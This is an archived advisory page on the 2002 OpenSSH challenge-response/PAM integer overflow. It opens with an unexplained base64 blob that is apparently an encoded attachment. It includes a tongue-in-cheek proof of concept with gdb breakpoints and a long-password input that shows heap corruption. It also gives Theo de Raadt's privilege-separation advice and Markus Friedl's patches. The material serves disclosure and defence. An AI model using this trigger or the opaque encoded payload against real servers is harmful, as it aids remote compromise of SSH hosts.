	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
	
	
	
	 Update (06 January 2003)
	 ======
	
	From Mickey Mouse  Hacking  Squadron  [mmhs@hushmail.com]  (hmmm  sounds
	like goobles :-) ) advisory :
	
	The following proof  of  concept  is  reproducing  Global  InterSec  LLC
	findings, enhanced with the patented research performed by Mickey  Mouse
	Hacking Squadron against OpenSSH 3.5p1.
	
	First of all, the OpenSSH  3.5p1  server  has  to  be  built  (with  PAM
	support enabled):
	
	$ tar xzf openssh-3.5p1.tar.gz
	$ cd openssh-3.5p1
	$ configure --with-pam
	[...]
	$ make sshd
	[...]
	
	Before the SSH server is actually executed, the sshd_config file  should
	be modified in order to enable PAM ("PAMAuthenticationViaKbdInt yes").
	
	# sshd
	
	In order to reveal the nature of the  OpenSSH  vulnerability,  the  next
	step is to connect to the SSH server:
	
	$ ssh werewolf.research.mmhs.com
	Password:
	
	Thanks to the "Password:" prompt, it  is  clear  that  PAM  is  actually
	enabled  (otherwise,   the   prompt   would   have   been   "user@host's
	password:"). This unique fingerprinting technique  was  investigated  by
	Mickey Mouse Hacking Squadron, and is  already  present  in  the  latest
	version of the Mickey  Mouse  Hacking  Squadron  award  winning  network
	vulnerability assessment tool.
	
	After the previous  command  was  executed,  the  freshly  spawned  sshd
	process has to be examined with a debugger, in order to set the  correct
	breakpoints within the  input_userauth_info_response_pam()  function  of
	OpenSSH, as demonstrated in the Global InterSec LLC advisory:
	
	# gdb sshd 6552
	(gdb) disassemble input_userauth_info_response_pam
	[...]
	0x80531bc <input_userauth_info_response_pam+192>:       push   %esi
	0x80531bd <input_userauth_info_response_pam+193>:
	    call   0x807306c <xfree>
	[...]
	(gdb) break *0x80531bd
	Breakpoint 1 at 0x80531bd: file auth2-pam.c, line 158.
	(gdb) continue
	Continuing.
	
	Now that the buggy call to xfree() can be intercepted,  the  SSH  client
	should trigger the integer overlow and the resulting heap overflow:
	
	$ ssh werewolf.research.mmhs.com
	Password: <type a thousand 'A' characters here and hit enter>
	
	After that, the xfree() breakpoint is reached,  and  the  next  call  to
	free() should therefore be intercepted  in  order  to  comply  with  the
	technique developed by Global InterSec LLC:
	
	Breakpoint 1, 0x080531bd in input_userauth_info_response_pam (type=61,
	    seqnr=7, ctxt=0x809c050) at auth2-pam.c:158
	158                     xfree(resp);
	(gdb) disassemble xfree
	[...]
	0x807308e <xfree+34>:   call   0x804ba14 <free>
	[...]
	(gdb) break *0x807308e
	Breakpoint 2 at 0x807308e: file xmalloc.c, line 55.
	(gdb) continue
	Continuing.
	
	Breakpoint 2, 0x0807308e in xfree (ptr=0x809dfb8) at xmalloc.c:55
	55              free(ptr);
	(gdb) x /10x 0x809dfb8
	0x809dfb8:      0x41414141      0x41414141      0x41414141      0x41414141
	0x809dfc8:      0x41414141      0x41414141      0x41414141      0x41414141
	0x809dfd8:      0x41414141      0x41414141
	
	From here on, as  demonstrated  by  Global  InterSec  LLC,  exploitation
	becomes trivial. For more information on exploiting calls to free()  see
	the excellent Phrack article "Once upon a free()" [2].
	
	 WORK AROUND ?
	 -----------
	
	As mentioned in
	
	 http://www.openssh.com/txt/preauth.adv, 
	
	and as demonstrated by noir in
	
	 http://www.phrack.org/phrack/60/p60-0x06.txt,
	
	"you    can    prevent    privilege    escalation    if    you    enable
	UsePrivilegeSeparation in sshd_config."

SOLUTION

	Post from Theo:
	
	I can say that when OpenSSH's sshd(8) is running with  priv  seperation,
	the bug cannot be exploited.
	
	OpenSSH 3.3p was released a few days ago, with various improvements  but
	in particular, it significantly improves the Linux and  Solaris  support
	for priv sep. However, it is not yet perfect. Compression is disabled  on
	some  systems,  and  the  many  varieties  of  PAM  are  causing   major
	headaches.
	
	However, everyone should update to OpenSSH 3.3 immediately,  and  enable
	priv  seperation  in  their  ssh  daemons,  by  setting  this  in   your
	/etc/ssh/sshd_config file:
	
	
		UsePrivilegeSeparation yes
	
	
	Depending  on  what  your  system  is,  privsep  may  break   some   ssh
	functionality. However, with privsep turned on, you are immune  from  at
	least one remote hole.  Understand?
	
	3.3 does not contain a fix for this upcoming bug.
	
	If priv seperation does not work on your operating system, you  need  to
	work with your vendor so that we get patches to make  it  work  on  your
	system. Our developers are swamped enough without trying to support  the
	myriad of PAM and other issues which exist in various systems. You  must
	call on your vendors to help us.
	
	Basically, OpenSSH sshd(8) is something like 27000 lines of code. A  lot
	of that runs as root. But when UsePrivilegeSeparation  is  enabled,  the
	daemon splits into two parts. A part  containing  about  2500  lines  of
	code remains as root, and  the  rest  of  the  code  is  shoved  into  a
	chroot-jail without any privs. This makes the daemon less vulnerable  to
	attack.
	
	We've been trying to warn vendors about 3.3 and the  need  for  privsep,
	but they really have not heeded  our  call  for  assistance.  They  have
	basically ignored us. Some, like Alan Cox,  even  went  further  stating
	that privsep was not being worked on because "Nobody provided  any  info
	which proves the problem, and many  people  dont  trust  you  theo"  and
	suggested I "might be feeding everyone a trojan" (I think  I'll  publish
	that letter -- it is just so funny). HP's representative  was  downright
	rude, but that is OK because Compaq is retiring him.  Except  for  Solar
	Designer,  I  think  none  of  them  has  helped  the  OpenSSH  portable
	developers make privsep work better on their systems.  Apparently  Solar
	Designer is the only person who understands the need for this stuff.
	
	So, if vendors would JUMP  and  get  it  working  better,  and  send  us
	patches IMMEDIATELY, we can perhaps make  a  3.3.1p  release  on  Friday
	which supports these systems better. So send patches by  Thursday  night
	please. Then on Tuesday  or  Wednesday  the  complete  bug  report  with
	patches (and exploits soon after I am sure) will hit BUGTRAQ.
	
	Let me repeat: even if the bug exists in a privsep'd  sshd,  it  is  not
	exploitable. Clearly we cannot yet publish what the bug is,  or  provide
	anyone with the real patch, but we can try to  get  maximum  deployement
	of privsep, and  therefore  make  it  hurt  less  when  the  problem  is
	published.
	
	So please push your vendor to get us maximally working  privsep  patches
	as soon as possible!
	
	We've given most vendors since Friday last week until  Thursday  to  get
	privsep working well for you so that when  the  announcement  comes  out
	next week their customers are immunized. That  is  nearly  a  full  week
	(but they have already wasted a weekend and a Monday).  Really  I  think
	this is the best we can hope to do (this thing will eventually leak,  at
	which point the details will be published).
	
	Customers can judge their vendors by how they respond to this issue.
	
	OpenBSD and NetBSD users should also update to OpenSSH 3.3  right  away.
	On OpenBSD privsep works flawlessly, and I have  reports  that  is  also
	true on NetBSD.  All  other  systems  appear  to  have  minor  or  major
	weaknesses when this code is running.
	
	
	 Update (27 June 2002)
	 ======
	
	Solar Designer adds : for the privilege-separated OpenSSH  sshd,  please
	refer to Niels Provos' web page on the topic:
	
		http://www.citi.umich.edu/u/provos/ssh/privsep.html
	
	
	Patch provided by Markus Friedl :
	
	
	Index: auth2-chall.c
	===================================================================
	RCS file: /cvs/src/usr.bin/ssh/auth2-chall.c,v
	retrieving revision 1.18
	diff -u -r1.18 auth2-chall.c
	--- auth2-chall.c	19 Jun 2002 00:27:55 -0000	1.18
	+++ auth2-chall.c	26 Jun 2002 09:37:03 -0000
	@@ -256,6 +256,8 @@
	 
	 	authctxt->postponed = 0;	/* reset */
	 	nresp = packet_get_int();
	+	if (nresp > 100)
	+		fatal("input_userauth_info_response: nresp too big %u", nresp);
	 	if (nresp > 0) {
	 		response = xmalloc(nresp * sizeof(char*));
	 		for (i = 0; i < nresp; i++)
	
	B:
	
	Index: auth2-pam.c
	===================================================================
	RCS file: /var/cvs/openssh/auth2-pam.c,v
	retrieving revision 1.12
	diff -u -r1.12 auth2-pam.c
	--- auth2-pam.c	22 Jan 2002 12:43:13 -0000	1.12
	+++ auth2-pam.c	26 Jun 2002 10:12:31 -0000
	@@ -140,6 +140,15 @@
	 	nresp = packet_get_int();	/* Number of responses. */
	 	debug("got %d responses", nresp);
	 
	+
	+	if (nresp != context_pam2.num_expected)
	+		fatal("%s: Received incorrect number of responses "
	+		    "(expected %u, received %u)", __func__, nresp,
	+		    context_pam2.num_expected);
	+
	+	if (nresp > 100)
	+		fatal("%s: too many replies", __func__);
	+
	 	for (i = 0; i < nresp; i++) {
	 		int j = context_pam2.prompts[i];
	
	
	 Update (06 January 2003)
	 ======
	
	No further comments yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH